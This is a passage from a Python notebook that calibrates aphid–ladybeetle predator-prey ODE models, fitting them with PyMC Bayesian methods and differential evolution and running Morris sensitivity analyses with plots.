        lower=(1.0 - percent_calibration) * a3,
        upper=1e6#(1.0 + 10 * percent_calibration) * a3,
    )
    # Priors for the initial conditions (held fixed at the observed values)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2)  # one noise level per observed series
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_1)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "EP3_model",
        EP3_ode_wrapper(
            time_calibration,
            r1_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
    )
# Coarse MLDA level 2: fitted to every 2nd observation.
# NOTE(review): this model is built but not passed to pm.MLDA below (only
# coarse_model_1 is) — confirm whether a two-level hierarchy was intended.
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
    [observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
    # Prior distributions for the model's parameters (must mirror the fine model)
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=1e6#(1.0 + 10 * percent_calibration) * a1,
    )
    a2_ = pm.Data("a2", a2)
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a3_ = pm.Uniform(
        "a3",
        lower=(1.0 - percent_calibration) * a3,
        upper=1e6#(1.0 + 10 * percent_calibration) * a3,
    )
    # Priors for the initial conditions (held fixed at the observed values)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    # NOTE(review): lower=0 differs from lower=1 used by the other levels — confirm intended.
    standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2)  # one noise level per observed series
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_2)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "EP3_model",
        EP3_ode_wrapper(
            time_calibration,
            r1_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
    )
# MLDA sampling: fine-model proposals are pre-screened by the coarse chain.
with fine_model_EP3:
    step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
    # step = pm.DEMetropolisZ()
    trace_calibration_EP3 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[221]:
# Quick look at the marginal posterior of a1.
plt.hist(trace_calibration_EP3['a1'], bins=35)
plt.show()
# In[222]:
# Variables whose posteriors are summarized/plotted below.
calibration_variable_names = [
    "std_deviation",
    "a1",
    "a3",
]
# In[223]:
# Posterior histogram for each calibrated variable.
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
    pm.plot_posterior(
        trace_calibration_EP3[::plot_step],
        var_names=(f"{variable}"),
        kind="hist",
        round_to=4,
        point_estimate="mode"
    )
    plt.savefig(f"img/{variable}_posterior_cal_EP3.png")
# In[224]:
# Pairwise joint posteriors (hexbin) with marginals.
az.plot_pair(
    trace_calibration_EP3,
    var_names=calibration_variable_names,
    kind="hexbin",
    fill_last=False,
    marginals=True,
    figsize=(10, 8),
)
plt.savefig("img/marginals_cal_EP3.png")
# In[225]:
df_stats_summary = az.summary(
    data=trace_calibration_EP3,
    var_names=calibration_variable_names,
    kind='stats',
    round_to=15,  # floating-point rounding used in the summary table
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[226]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
    """Compute the Most Probable Value of each variable in a PyMC trace.

    Vector-valued variables are decomposed per dimension and reported under
    keys of the form "name[d]"; scalar variables keep their own name.
    """
    mpv_by_name = dict()
    progress = tqdm(variable_names)
    for name in progress:
        progress.set_description(f"Calculating MPV from KDE for {name}")
        realizations = pm_trace[f"{name}"]
        # A 1D realization array has no second axis: treat it as scalar.
        try:
            n_dims = realizations.shape[1]
        except IndexError:
            n_dims = 0
        if n_dims == 0:
            mpv_by_name[f"{name}"] = _scalar_rv_mvp_estimation(realizations)
        else:
            for dim in range(n_dims):
                component = np.array(realizations[:, dim])
                mpv_by_name[f"{name}[{dim}]"] = _scalar_rv_mvp_estimation(component)
    return mpv_by_name
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
    """Return a copy of an ArviZ stats summary with an extra "mpv" column.

    The column is aligned on the summary's index via the dict keys; variables
    missing from *rv_modes_dict* get NaN. The input frame is not mutated.
    """
    summary_with_mpv = arviz_summary.copy()
    mpv_series = pd.Series(
        data=list(rv_modes_dict.values()), index=list(rv_modes_dict.keys())
    )
    summary_with_mpv["mpv"] = mpv_series
    return summary_with_mpv
# In[227]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
pm_trace=trace_calibration_EP3, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_EP3.csv") # salvando em um csv para consultas
df_stats_summary
# In[228]:
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_EP3["EP3_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_EP3["EP3_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_EP3["EP3_model"], 50, axis=0)
# In[229]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_EP3.png", dpi=300)
plt.show()
# In[230]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_EP3.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_EP3.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[231]:
df_realizations
# # Logistic Prey Growth FR1 model
# In[232]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def LP1_model(
    t,
    X,
    r1 = 1,
    r2 = 2,
    a1 = 1,
):
    """RHS of the LP1 system: logistic prey growth with a linear predation
    term; the predator density is held constant (zero time-derivative)."""
    prey, predator = X
    prey_rate = r1 * prey - r2 * prey * prey - a1 * prey * predator
    predator_rate = 0
    return prey_rate, predator_rate
def LP1_ode_solver(
    y0,
    t_span,
    t_eval,
    r1 = 1,
    r2 = 2,
    a1 = 1,
):
    """Integrate the LP1 system over *t_span* from state *y0*.

    Uses LSODA (automatic stiff/non-stiff switching) and reports the solution
    at the requested *t_eval* points; returns the solve_ivp result object.
    """
    return solve_ivp(
        fun=LP1_model,
        t_span=t_span,
        y0=y0,
        t_eval=t_eval,
        args=(r1, r2, a1),
        method="LSODA",
    )
# Time grid matching the experimental observation window (no forecasting).
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
# Observed densities used as calibration targets.
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[233]:
def LP1_least_squares_error_ode(
    par, time_exp, f_exp, fitting_model, initial_conditions
):
    """Weighted least-squares residual between observations and an LP1 run.

    :param par: iterable of model parameters forwarded to *fitting_model*.
    :param time_exp: experimental time points (also used as t_eval).
    :param f_exp: pair (prey series, predator series) of observed densities.
    :param fitting_model: solver with signature (y0, t_span, t_eval, *par)
        returning an object with `.t` and `.y` (solve_ivp-like).
    :param initial_conditions: initial state y0 passed to the solver.
    :return: mean of the weighted sums of squared residuals, or 1e15 when the
        integration raises ValueError (steers global optimizers away from
        regions where the ODE cannot be solved).
    """
    f_exp1, f_exp2 = f_exp
    time_span = (time_exp.min(), time_exp.max())
    weighting_for_exp1_constraints = 1
    weighting_for_exp2_constraints = 1
    num_of_qoi = len(f_exp)
    try:
        y_model = fitting_model(initial_conditions, time_span, time_exp, *par)
        simulated_qoi1, simulated_qoi2 = y_model.y
        residual1 = f_exp1 - simulated_qoi1
        residual2 = f_exp2 - simulated_qoi2
        first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
        second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
        objective_function = 1 / num_of_qoi * (first_term + second_term)
    except ValueError:
        # Deliberate best-effort: a failed integration gets a huge penalty
        # instead of aborting the optimization.
        objective_function = 1e15
    return objective_function
def callback_de(xk, convergence):
    """Progress callback for scipy's differential_evolution: prints the
    current best parameter vector after each generation."""
    print('parameters = {}\n'.format(xk))
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[234]:
from scipy import optimize
# Fixed seed so the stochastic Differential Evolution search is reproducible.
seed = 1234
# Nominal parameter values (presumably from a previous calibration run —
# TODO confirm provenance); bounds are built as a multiplicative band
# [0.1x, 1.9x] around them.
r1=0.0025591841125063588
r2=4.3094146773353513e-11
a1=0.005814656330586127
denom_min = 0.1
denom_max = 1.9
bounds_LP1 = [
    ( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
    ( ( r2 * denom_min ), ( r2 * denom_max ) ), # r2
    ( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
]
# Global least-squares calibration of the LP1 parameters.
result_LP1 = optimize.differential_evolution(
    LP1_least_squares_error_ode,
    bounds=bounds_LP1,
    args=(
        aphid_data.Time.values,
        [aphid_data.Density.values, ladybeetle_data.Density.values],
        LP1_ode_solver,
        y0,
    ),
    popsize=30,
    strategy="best1bin",
    tol=1e-5,
    recombination=0.95,
    mutation=0.6,
    maxiter=20000, # 2000
    polish=True,
    disp=True,
    seed = seed, # for the sake of reproducibility
    callback=callback_de,
    workers=-1,  # use all available cores
)
print(result_LP1)
# * Retrieving the calibrated parameter values:
# In[235]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
r2_deterministic,
a1_deterministic,
) = result_LP1.x
solution_ODE_LP1 = LP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_LP1.x
)
t_computed_LP1, y_computed_LP1 = solution_ODE_LP1.t, solution_ODE_LP1.y
u_LP1, v_LP1 = y_computed_LP1
parameters_dict = {
"Model": "LP1",
u"$r1$": r1_deterministic,
u"$r2$": r2_deterministic,
u"$a1$": a1_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "r2=" + str(r2_deterministic) + "\n" + "a1=" + str(a1_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[236]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_LP1, u_LP1, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_LP1, v_LP1, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[237]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
r2,
a1,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[238]:
from tqdm import tqdm
# Evaluate the least-squares objective for every Morris sample; the scalar
# residual is the quantity of interest for this sensitivity analysis.
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    residual_least_squares_result = LP1_least_squares_error_ode(
        parameters_realization,
        aphid_data.Time.values,
        [u_data, v_data],
        LP1_ode_solver,
        y0
    )
    qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[239]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[240]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_LP1.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[241]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
r2,
a1,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[242]:
from tqdm import tqdm
# Time-dependent sensitivity analysis: simulate LP1 for every Morris sample
# and store the prey trajectory as the quantity of interest per time point.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    realization_ODE_LP1 = LP1_ode_solver(
        y0,
        (t0, tf + days_to_forecast),
        time_range,
        *parameters_realization
    )
    u_realization, v_realization = realization_ODE_LP1.y
    qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[243]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
# Morris analysis at each time point: normalize mu* and sigma across factors
# so each row of df_Si / df_sigmai sums to one.
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # Was a bare `except:` (also caught KeyboardInterrupt/SystemExit);
        # narrowed to Exception. Failed time points are skipped here and
        # dropped later by dropna().
        continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[244]:
df_sigmai
# In[245]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_LP1.png", dpi=300)
plt.show()
# In[246]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_LP1.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[247]:
def calculate_pest_time_derivative_series(
    time_array,
    u_array,
    v_array,
    ode_model,
    model_pars
):
    """Evaluate the pest (prey) time-derivative along a computed trajectory.

    At each time point the ODE right-hand side is evaluated at the matching
    (u, v) state and the first component (the pest equation) is collected.

    :param time_array: 1D array of time points.
    :param u_array: pest densities at each time point (same length).
    :param v_array: predator densities at each time point (same length).
    :param ode_model: callable (t, [u, v], *model_pars) -> (du/dt, dv/dt).
    :param model_pars: iterable of parameters forwarded to *ode_model*.
    :return: np.ndarray of du/dt values, one per time point.
    """
    # Loop variable renamed from `time` to `t` to stop shadowing the `time`
    # module imported at file level; append-loop replaced by a comprehension.
    pest_time_derivative_values = [
        ode_model(t, [u, v], *model_pars)[0]
        for t, u, v in zip(time_array, u_array, v_array)
    ]
    return np.array(pest_time_derivative_values)
# In[248]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_LP1,
u_LP1,
v_LP1,
LP1_model,
mean_values_params
)
pest_time_derivative_array
# In[249]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_LP1, u_LP1, '-x', label='Pest population')
plt.plot(t_computed_LP1, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_LP1.png", dpi=300)
plt.show()
# In[250]:
mean_values_params = [
r1,
r2,
a1,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[251]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_LP1 = LP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_LP1.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
LP1_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[252]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
# Morris analysis per time point for the pest time-derivative QoI; mu* and
# sigma are normalized across factors so each row sums to one.
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # Was a bare `except:` (also caught KeyboardInterrupt/SystemExit);
        # narrowed to Exception. Failed time points are skipped here and
        # dropped later by dropna().
        continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[253]:
df_sigmai
# In[254]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_LP1.png", dpi=300)
plt.show()
# In[255]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_LP1.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[256]:
@theano.compile.ops.as_op(
    itypes=[
        t.dvector,
        t.dscalar,  # r1
        t.dscalar,  # r2
        t.dscalar,  # a1
        t.dscalar,  # u0
        t.dscalar,  # v0
    ],
    otypes=[t.dmatrix]
)
def LP1_ode_wrapper(time_exp, r1, r2, a1, u0, v0):
    """Theano-compatible wrapper: integrate LP1 over the span of *time_exp*
    and return an (n_times, 2) matrix with prey and predator columns."""
    solution = solve_ivp(
        LP1_model,
        (time_exp.min(), time_exp.max()),
        np.array([u0, v0]),
        t_eval=time_exp,
        method='LSODA',
        args=[r1, r2, a1]
    )
    prey_series, predator_series = solution.y
    return np.vstack([prey_series, predator_series]).T
# In[257]:
# Assemble the observation matrix (one column per species) and the fine-level
# PyMC model for the LP1 Bayesian calibration.
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000
start_time = time.time()
percent_calibration = 0.95
with pm.Model() as fine_model_LP1:
    # Prior distributions for the model's parameters.
    # r1 and r2 are held fixed at their deterministic values (pm.Data);
    # only a1 is calibrated, with a uniform band of +/-95% around it.
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    # r2_ = pm.Uniform(
    #     "r2",
    #     lower=(1.0 - percent_calibration) * r2,
    #     upper=(1.0 + percent_calibration) * r2,
    # )
    r2_ = pm.Data("r2", r2)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=(1.0 + percent_calibration) * a1,
    )
    # Priors for initial conditions (fixed at the observed values).
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    # One noise std-deviation per observed species.
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions.
    time_calibration = pm.Data("time", time_observations)
    # Deterministic node: the ODE solution at the calibration time points.
    fitting_model = pm.Deterministic(
        "LP1_model",
        LP1_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            a1_,
            u0_,
            v0_
        ),
    )
    # Gaussian likelihood around the simulated trajectories.
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
    )
# First coarse level for MLDA: same model structure, but fitted to every
# 4th observation to make likelihood evaluations cheaper.
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
    [observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
    # Prior distributions for the model's parameters (mirrors the fine model:
    # r1 and r2 fixed, a1 uniform).
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    # r2_ = pm.Uniform(
    #     "r2",
    #     lower=(1.0 - percent_calibration) * r2,
    #     upper=(1.0 + percent_calibration) * r2,
    # )
    r2_ = pm.Data("r2", r2)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=(1.0 + percent_calibration) * a1,
    )
    # Priors for initial conditions (fixed at the observed values).
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions.
    time_calibration = pm.Data("time", time_observations_coarse_1)
    # Deterministic node: the ODE solution at the coarse time points.
    fitting_model = pm.Deterministic(
        "LP1_model",
        LP1_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            a1_,
            u0_,
            v0_
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
    )
# Second coarse level: fitted to every 2nd observation.
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
    [observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
    # Prior distributions for the model's parameters (r1 and r2 fixed,
    # a1 uniform — mirrors the fine model).
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    # r2_ = pm.Uniform(
